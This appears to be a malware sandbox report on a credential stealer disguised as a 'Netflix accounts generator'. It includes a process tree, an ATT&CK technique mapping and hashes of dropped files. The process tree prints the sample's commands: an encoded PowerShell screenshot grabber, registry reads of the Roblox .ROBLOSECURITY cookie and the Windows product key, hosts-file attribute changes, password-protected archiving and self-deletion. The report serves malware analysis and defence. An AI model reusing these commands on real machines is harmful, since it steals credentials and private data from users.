    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3400
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykbf2xsv\ykbf2xsv.cmdline"
        5⤵
        
        PID:948
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD580.tmp" "c:\Users\Admin\AppData\Local\Temp\ykbf2xsv\CSC2972FB45F1054BF8B2DCC31BCB5A1C44.TMP"
        6⤵
        
        PID:2680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4220
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4504
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2044
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2316
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4860
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2652
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3784
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3324
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3488
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1032
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI9362\rar.exe a -r -hp"lolpolol2004PL#" "C:\Users\Admin\AppData\Local\Temp\9O26K.zip" *"
    3⤵
    PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\_MEI9362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI9362\rar.exe a -r -hp"lolpolol2004PL#" "C:\Users\Admin\AppData\Local\Temp\9O26K.zip" *
      4⤵
      Executes dropped EXE
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2412
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3732
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe""
    3⤵
    PID:2028
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3544

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e3840d9bcedfe7017e49ee5d05bd1c46

SHA1
272620fb2605bd196df471d62db4b2d280a363c6

SHA256
3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

SHA512
76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e1ef6fbc74d85d0263d77e15a30c6bc

SHA1
7780cf3f57a09f67a0cefe0dc3ad859b58d7ceae

SHA256
2c1fb64a0034496a502dc675a8e972cd1010eeccb54b4aa2eb1886d0f5807bdb

SHA512
4bd3016302801673a9002f1f64aa3d56682b87f4e0152a52cabc4b4a1be7924ef830af6bb2bb311546e8f2650be8fae80972261f82515bb8116923460dd9a452

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e3da02407f9a696e6afa6d957eb2dc79

SHA1
11f2e05a9ddd229d7524a6acb88717f699265c2d

SHA256
5a0dd0aa99e14fa2d7e8fd71b05e536b7cc56527696ecda9db276b501c54a165

SHA512
11a24ac1d010ba600fde9b38431f813fb00d92b09f39507f7a169d4627327bf1be25cf5f2b378659a162888efe4adedb49d46cb1748449e614f27beaf4297945

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
679e41aa253f7de743ea72674bcb597b

SHA1
bcbb0dfcb57b59185a74dc016dada8c60088495d

SHA256
25179915016f1ad51fe05241b305eccfb3d8cd8cb4af08b6884b44ca45885eba

SHA512
a9f2641884de4983b609ad7ea95a20dbb6e0b0a244c2a75719b1ce7543cf9d96815b9f5eb231af5fcd6e91363d394ac8b7c8a30f10a46fa92ba50e4e48992b86

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD580.tmp

Filesize
1KB

MD5
c36e294c6a8fe05dcbcad745ae261d30

SHA1
c8ebb10a193419534ff687adb42e3ce09fb97720

SHA256
22d3c91d519fc8667614c715727da8cbe2741a7b5ad00c2f1115148d04780f42

SHA512
321ba81881f3dab00d3e9c5e102dcb6f0dbf112b7ab5ede4c3f5c7c03e7916354b3a81d37e6245e5058f2a6428d74c2ab5ad18e26a1d6bbe5e556a18e7e63cfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_bz2.pyd

Filesize
46KB

MD5
93fe6d3a67b46370565db12a9969d776

SHA1
ff520df8c24ed8aa6567dd0141ef65c4ea00903b

SHA256
92ec61ca9ac5742e0848a6bbb9b6b4cda8e039e12ab0f17fb9342d082dde471b

SHA512
5c91b56198a8295086c61b4f4e9f16900a7ec43ca4b84e793bc8a3fc8676048cab576e936515bf2971318c7847f1314674b3336fe83b1734f9f70d09615519ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_ctypes.pyd

Filesize
56KB

MD5
813fc3981cae89a4f93bf7336d3dc5ef

SHA1
daff28bcd155a84e55d2603be07ca57e3934a0de

SHA256
4ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06

SHA512
ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_decimal.pyd

Filesize
103KB

MD5
f65d2fed5417feb5fa8c48f106e6caf7

SHA1
9260b1535bb811183c9789c23ddd684a9425ffaa

SHA256
574fe8e01054a5ba07950e41f37e9cf0aea753f20fe1a31f58e19202d1f641d8

SHA512
030502fa4895e0d82c8cce00e78831fc3b2e6d956c8cc3b9fb5e50cb23ef07cd6942949a9f16d02da6908523d9d4ef5f722fb1336d4a80cd944c9f0cb11239ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_hashlib.pyd

Filesize
33KB

MD5
4ae75c47dbdebaa16a596f31b27abd9e

SHA1
a11f963139c715921dedd24bc957ab6d14788c34

SHA256
2308ee238cc849b1110018b211b149d607bf447f4e4c1e61449049eab0cf513d

SHA512
e908fecb52268fac71933e2fdb96e539bdebe4675dfb50065aee26727bac53e07cca862193bcb3ab72d2ae62d660113a47e73e1e16db401480e4d3fd34d54fa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_lzma.pyd

Filesize
84KB

MD5
6f810f46f308f7c6ccddca45d8f50039

SHA1
6ee24ff6d1c95ba67e1275bb82b9d539a7f56cea

SHA256
39497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76

SHA512
c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_queue.pyd

Filesize
24KB

MD5
0e7612fc1a1fad5a829d4e25cfa87c4f

SHA1
3db2d6274ce3dbe3dbb00d799963df8c3046a1d6

SHA256
9f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8

SHA512
52c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_socket.pyd

Filesize
41KB

MD5
7a31bc84c0385590e5a01c4cbe3865c3

SHA1
77c4121abe6e134660575d9015308e4b76c69d7c

SHA256
5614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36

SHA512
b80cd51e395a3ce6f345b69243d8fc6c46e2e3828bd0a7e63673a508d889a9905d562cac29f1ed394ccfcda72f2f2e22f675963dd96261c19683b06dea0a0882

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_sqlite3.pyd

Filesize
48KB

MD5
bb4aa2d11444900c549e201eb1a4cdd6

SHA1
ca3bb6fc64d66deaddd804038ea98002d254c50e

SHA256
f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f

SHA512
cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI9362\_ssl.pyd

Filesize
60KB

MD5
081c878324505d643a70efcc5a80a371

SHA1
8bef8336476d8b7c5c9ef71d7b7db4100de32348

SHA256
fcb70b58f94f5b0f9d027999cce25e99ddcc8124e4ddcc521cb5b96a52faaa66

SHA512
